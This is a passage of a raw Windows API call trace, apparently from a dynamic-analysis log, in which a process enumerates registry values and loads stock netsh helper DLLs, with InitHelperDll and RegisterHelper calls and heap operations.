dwFlags=0x0, lpMem=0x285e30 | out: hHeap=0x250000) returned 1 [0133.929] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="nshhttp", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0133.929] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0133.929] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0133.929] GetProcessHeap () returned 0x250000 [0133.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xf0) returned 0x285e30 [0133.929] GetProcessHeap () returned 0x250000 [0133.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x283600 [0133.929] GetProcessHeap () returned 0x250000 [0133.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x283620 [0133.929] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0133.929] GetProcessHeap () returned 0x250000 [0133.929] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x280ea0 | out: hHeap=0x250000) returned 1 [0133.929] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef33a0000 [0134.353] GetProcAddress (hModule=0x7fef33a0000, lpProcName="InitHelperDll") returned 0x7fef33a1c24 [0134.353] InitHelperDll () returned 0x0 [0134.353] RegisterHelper () returned 0x0 [0134.353] GetProcessHeap () returned 0x250000 [0134.353] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x3c8) returned 0x286f20 [0134.353] GetProcessHeap () returned 0x250000 [0134.353] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x286ba0 | out: hHeap=0x250000) returned 1 [0134.353] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="fwcfg", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0134.353] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0134.353] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0134.353] GetProcessHeap () returned 0x250000 [0134.353] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x118) returned 0x285f30 [0134.353] GetProcessHeap () returned 0x250000 [0134.353] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x283640 [0134.353] GetProcessHeap () returned 0x250000 [0134.353] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x14) returned 0x283660 [0134.353] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0134.354] GetProcessHeap () returned 0x250000 [0134.354] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x285e30 | out: hHeap=0x250000) returned 1 [0134.354] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef3260000 [0136.544] GetProcAddress (hModule=0x7fef3260000, lpProcName="InitHelperDll") returned 0x7fef3262d20 [0136.544] InitHelperDll () returned 0x0 [0136.544] RegisterHelper () returned 0x0 [0136.544] GetProcessHeap () returned 0x250000 [0136.544] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x420) returned 0x28b2f0 [0136.544] GetProcessHeap () returned 0x250000 [0136.544] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x286f20 | out: hHeap=0x250000) returned 1 [0136.544] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="authfwcfg", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0136.544] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0136.544] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0136.544] GetProcessHeap () returned 0x250000 [0136.544] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x140) returned 0x286ba0 [0136.544] GetProcessHeap () returned 0x250000 [0136.544] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x14) returned 0x2836a0 [0136.544] GetProcessHeap () returned 0x250000 [0136.544] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c) returned 0x286720 [0136.544] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0136.544] GetProcessHeap () returned 0x250000 [0136.544] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x285f30 | out: hHeap=0x250000) returned 1 [0136.544] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef2cb0000 [0139.680] GetProcAddress (hModule=0x7fef2cb0000, lpProcName="InitHelperDll") returned 0x7fef2cb5d20 [0139.680] InitHelperDll () returned 0x0 [0142.006] RegisterHelper () returned 0x0 [0142.006] GetProcessHeap () returned 0x250000 [0142.006] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x478) returned 0x28e740 [0142.006] GetProcessHeap () returned 0x250000 [0142.006] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28b2f0 | out: hHeap=0x250000) returned 1 [0142.006] RegisterHelper () returned 0x0 [0142.006] GetProcessHeap () returned 0x250000 [0142.006] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4d0) returned 0x28ebc0 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28e740 | out: hHeap=0x250000) returned 1 [0142.007] RegisterHelper () returned 0x0 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x528) returned 0x28f0a0 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28ebc0 | out: hHeap=0x250000) returned 1 [0142.007] RegisterHelper () returned 0x0 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x580) returned 0x28e740 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28f0a0 | out: hHeap=0x250000) returned 1 [0142.007] RegisterHelper () returned 0x0 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x5d8) returned 0x28ecd0 [0142.007] GetProcessHeap () returned 0x250000 [0142.007] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28e740 | out: hHeap=0x250000) returned 1 [0142.007] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="2", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0142.008] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0142.008] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0142.008] GetProcessHeap () returned 0x250000 [0142.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x168) returned 0x287140 [0142.008] GetProcessHeap () returned 0x250000 [0142.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4) returned 0x2872b0 [0142.008] GetProcessHeap () returned 0x250000 [0142.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x14) returned 0x28e170 [0142.008] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0142.008] GetProcessHeap () returned 0x250000 [0142.008] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x286ba0 | out: hHeap=0x250000) returned 1 [0142.008] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef3230000 [0142.356] GetProcAddress (hModule=0x7fef3230000, lpProcName="InitHelperDll") returned 0x7fef3231924 [0142.356] InitHelperDll () returned 0x0 [0142.356] RegisterHelper () returned 0x0 [0142.356] GetProcessHeap () returned 0x250000 [0142.357] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x630) returned 0x290ab0 [0142.357] GetProcessHeap () returned 0x250000 [0142.357] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28ecd0 | out: hHeap=0x250000) returned 1 [0142.357] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="netiohlp", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0142.357] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0142.357] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0142.357] GetProcessHeap () returned 0x250000 [0142.357] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x190) returned 0x28b3c0 [0142.357] GetProcessHeap () returned 0x250000 [0142.357] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e290 [0142.357] GetProcessHeap () returned 0x250000 [0142.357] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x28f970 [0142.357] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0142.358] GetProcessHeap () returned 0x250000 [0142.358] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x287140 | out: hHeap=0x250000) returned 1 [0142.358] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef2f20000 [0144.997] GetProcAddress (hModule=0x7fef2f20000, lpProcName="InitHelperDll") returned 0x7fef2f3ce30 [0144.997] InitHelperDll () returned 0x0 [0144.997] RegisterHelper () returned 0x0 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x688) returned 0x2910f0 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x290ab0 | out: hHeap=0x250000) returned 1 [0144.997] RegisterHelper () returned 0x0 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6e0) returned 0x291780 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2910f0 | out: hHeap=0x250000) returned 1 [0144.997] RegisterHelper () returned 0x0 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x738) returned 0x290ab0 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x291780 | out: hHeap=0x250000) returned 1 [0144.997] RegisterHelper () returned 0x0 [0144.997] GetProcessHeap () returned 0x250000 [0144.997] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x790) returned 0x2911f0 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x290ab0 | out: hHeap=0x250000) returned 1 [0144.998] RegisterHelper () returned 0x0 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x7e8) returned 0x291990 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2911f0 | out: hHeap=0x250000) returned 1 [0144.998] RegisterHelper () returned 0x0 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x840) returned 0x292180 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x291990 | out: hHeap=0x250000) returned 1 [0144.998] RegisterHelper () returned 0x0 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x898) returned 0x290ab0 [0144.998] GetProcessHeap () returned 0x250000 [0144.998] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x292180 | out: hHeap=0x250000) returned 1 [0144.999] RegisterHelper () returned 0x0 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8f0) returned 0x291350 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x290ab0 | out: hHeap=0x250000) returned 1 [0144.999] RegisterHelper () returned 0x0 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x948) returned 0x291c50 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x291350 | out: hHeap=0x250000) returned 1 [0144.999] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="whhelper", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0144.999] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0144.999] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1b8) returned 0x28b560 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e2d0 [0144.999] GetProcessHeap () returned 0x250000 [0144.999] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x28ead0 [0144.999] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0144.999] GetProcessHeap () returned 0x250000 [0144.999] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28b3c0 | out: hHeap=0x250000) returned 1 [0144.999] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef3220000 [0145.530] GetProcAddress (hModule=0x7fef3220000, lpProcName="InitHelperDll") returned 0x7fef322210c [0145.530] InitHelperDll () returned 0x0 [0145.530] RegisterHelper () returned 0x0 [0145.530] GetProcessHeap () returned 0x250000 [0145.530] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x9a0) returned 0x2925a0 [0145.530] GetProcessHeap () returned 0x250000 [0145.530] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x291c50 | out: hHeap=0x250000) returned 1 [0145.530] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="hnetmon", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0145.530] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0145.530] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0145.530] GetProcessHeap () returned 0x250000 [0145.530] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1e0) returned 0x28ef40 [0145.530] GetProcessHeap () returned 0x250000 [0145.530] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x28e2f0 [0145.530] GetProcessHeap () returned 0x250000 [0145.530] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x28e310 [0145.530] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0145.530] GetProcessHeap () returned 0x250000 [0145.531] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28b560 | out: hHeap=0x250000) returned 1 [0145.531] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef3210000 [0147.819] GetProcAddress (hModule=0x7fef3210000, lpProcName="InitHelperDll") returned 0x7fef32122a4 [0147.819] InitHelperDll () returned 0x0 [0147.819] RegisterHelper () returned 0x0 [0147.819] GetProcessHeap () returned 0x250000 [0147.819] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x9f8) returned 0x292f50 [0147.819] GetProcessHeap () returned 0x250000 [0147.819] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2925a0 | out: hHeap=0x250000) returned 1 [0147.820] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="rpc", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0147.820] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0147.820] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0147.820] GetProcessHeap () returned 0x250000 [0147.820] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x208) returned 0x293950 [0147.820] GetProcessHeap () returned 0x250000 [0147.820] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x28b6f0 [0147.820] GetProcessHeap () returned 0x250000 [0147.820] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x16) returned 0x28e390 [0147.820] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0147.820] GetProcessHeap () returned 0x250000 [0147.820] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28ef40 | out: hHeap=0x250000) returned 1 [0147.820] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef2f10000 [0148.397] GetProcAddress (hModule=0x7fef2f10000, lpProcName="InitHelperDll") returned 0x7fef2f12e88 [0148.397] InitHelperDll () returned 0x0 [0148.397] RegisterHelper () returned 0x0 [0148.397] GetProcessHeap () returned 0x250000 [0148.397] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xa50) returned 0x2922b0 [0148.397] GetProcessHeap () returned 0x250000 [0148.397] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x292f50 | out: hHeap=0x250000) returned 1 [0148.398] RegisterHelper () returned 0x0 [0148.398] GetProcessHeap () returned 0x250000 [0148.398] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xaa8) returned 0x292d10 [0148.398] GetProcessHeap () returned 0x250000 [0148.398] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2922b0 | out: hHeap=0x250000) returned 1 [0148.398] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="dot3cfg", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0148.398] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0148.398] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0148.398] GetProcessHeap () returned 0x250000 [0148.398] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x230) returned 0x28ef40 [0148.398] GetProcessHeap () returned 0x250000 [0148.398] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x28e3b0 [0148.398] GetProcessHeap () returned 0x250000 [0148.398] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x28e3d0 [0148.398] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0148.398] GetProcessHeap () returned 0x250000 [0148.398] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x293950 | out: hHeap=0x250000) returned 1 [0148.398] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef2c90000 [0151.587] GetProcAddress (hModule=0x7fef2c90000, lpProcName="InitHelperDll") returned 0x7fef2c9390c [0151.587] InitHelperDll () returned 0x0 [0151.587] RegisterHelper () returned 0x0 [0151.587] GetProcessHeap () returned 0x250000 [0151.587] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xb00) returned 0x294fd0 [0151.587] GetProcessHeap () returned 0x250000 [0151.587] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x292d10 | out: hHeap=0x250000) returned 1 [0151.587] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="napmontr", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0151.587] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0151.587] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0151.587] GetProcessHeap () returned 0x250000 [0151.587] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x258) returned 0x295ae0 [0151.587] GetProcessHeap () returned 0x250000 [0151.587] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e470 [0151.587] GetProcessHeap () returned 0x250000 [0151.587] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x293be0 [0151.587] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0151.587] GetProcessHeap () returned 0x250000 [0151.587] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x28ef40 | out: hHeap=0x250000) returned 1 [0151.587] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef29a0000 [0154.516] GetProcAddress (hModule=0x7fef29a0000, lpProcName="InitHelperDll") returned 0x7fef29b048c [0154.516] InitHelperDll () returned 0x0 [0154.516] RegisterHelper () returned 0x0 [0154.516] GetProcessHeap () returned 0x250000 [0154.516] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xb58) returned 0x295fd0 [0154.517] GetProcessHeap () returned 0x250000 [0154.517] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x294fd0 | out: hHeap=0x250000) returned 1 [0154.517] RegisterHelper () returned 0x0 [0154.517] GetProcessHeap () returned 0x250000 [0154.517] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xbb0) returned 0x296b30 [0154.517] GetProcessHeap () returned 0x250000 [0154.517] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x295fd0 | out: hHeap=0x250000) returned 1 [0154.517] RegisterHelper () returned 0x0 [0154.517] GetProcessHeap () returned 0x250000 [0154.517] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc08) returned 0x2976f0 [0154.517] GetProcessHeap () returned 0x250000 [0154.517] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x296b30 | out: hHeap=0x250000) returned 1 [0154.517] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="nshipsec", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0154.518] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0154.518] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0154.518] GetProcessHeap () returned 0x250000 [0154.518] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x280) returned 0x292ec0 [0154.518] GetProcessHeap () returned 0x250000 [0154.518] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e530 [0154.518] GetProcessHeap () returned 0x250000 [0154.518] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x292ab0 [0154.518] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0154.518] GetProcessHeap () returned 0x250000 [0154.518] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x295ae0 | out: hHeap=0x250000) returned 1 [0154.518] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef28a0000 [0159.233] GetProcAddress (hModule=0x7fef28a0000, lpProcName="InitHelperDll") returned 0x7fef28a6230 [0159.233] InitHelperDll () returned 0x0 [0159.233] RegisterHelper () returned 0x0 [0159.233] GetProcessHeap () returned 0x250000 [0159.233] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc60) returned 0x29cd30 [0159.234] GetProcessHeap () returned 0x250000 [0159.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2976f0 | out: hHeap=0x250000) returned 1 [0159.234] RegisterHelper () returned 0x0 [0159.234] GetProcessHeap () returned 0x250000 [0159.234] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xcb8) returned 0x296fd0 [0159.234] GetProcessHeap () returned 0x250000 [0159.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29cd30 | out: hHeap=0x250000) returned 1 [0159.234] RegisterHelper () returned 0x0 [0159.234] GetProcessHeap () returned 0x250000 [0159.234] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xd10) returned 0x29cd30 [0159.234] GetProcessHeap () returned 0x250000 [0159.234] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x296fd0 | out: hHeap=0x250000) returned 1 [0159.741] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="nettrace", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0159.741] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0159.741] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0159.741] GetProcessHeap () returned 0x250000 [0159.741] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2a8) returned 0x296fd0 [0159.742] GetProcessHeap () returned 0x250000 [0159.742] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e710 [0159.742] GetProcessHeap () returned 0x250000 [0159.742] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x295510 [0159.742] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0159.742] GetProcessHeap () returned 0x250000 [0159.742] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x292ec0 | out: hHeap=0x250000) returned 1 [0159.742] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef26d0000 [0166.813] GetProcAddress (hModule=0x7fef26d0000, lpProcName="InitHelperDll") returned 0x7fef2717360 [0166.813] InitHelperDll () returned 0x0 [0166.813] RegisterHelper () returned 0x0 [0166.813] GetProcessHeap () returned 0x250000 [0166.813] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xd68) returned 0x2a2610 [0166.814] GetProcessHeap () returned 0x250000 [0166.814] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29cd30 | out: hHeap=0x250000) returned 1 [0166.814] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="WcnNetsh", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0166.814] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0166.814] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0166.814] GetProcessHeap () returned 0x250000 [0166.814] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2d0) returned 0x2a3380 [0166.814] GetProcessHeap () returned 0x250000 [0166.814] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x28e610 [0166.814] GetProcessHeap () returned 0x250000 [0166.814] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x2a2310 [0166.814] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0166.814] 